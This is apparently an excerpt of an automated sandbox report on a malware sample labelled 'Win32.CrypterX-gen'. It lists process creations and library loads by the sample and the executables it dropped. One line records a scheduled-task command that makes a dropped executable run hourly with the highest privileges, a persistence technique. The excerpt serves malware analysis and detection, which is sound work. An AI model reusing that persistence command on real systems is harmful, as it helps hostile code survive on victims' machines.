Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7888 -s 876
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Process created: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe "C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe" -i
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Section loaded: k7rn7l32.dll
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Section loaded: ntd3ll.dll
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Section loaded: winmm.dll
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Section loaded: powrprof.dll
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
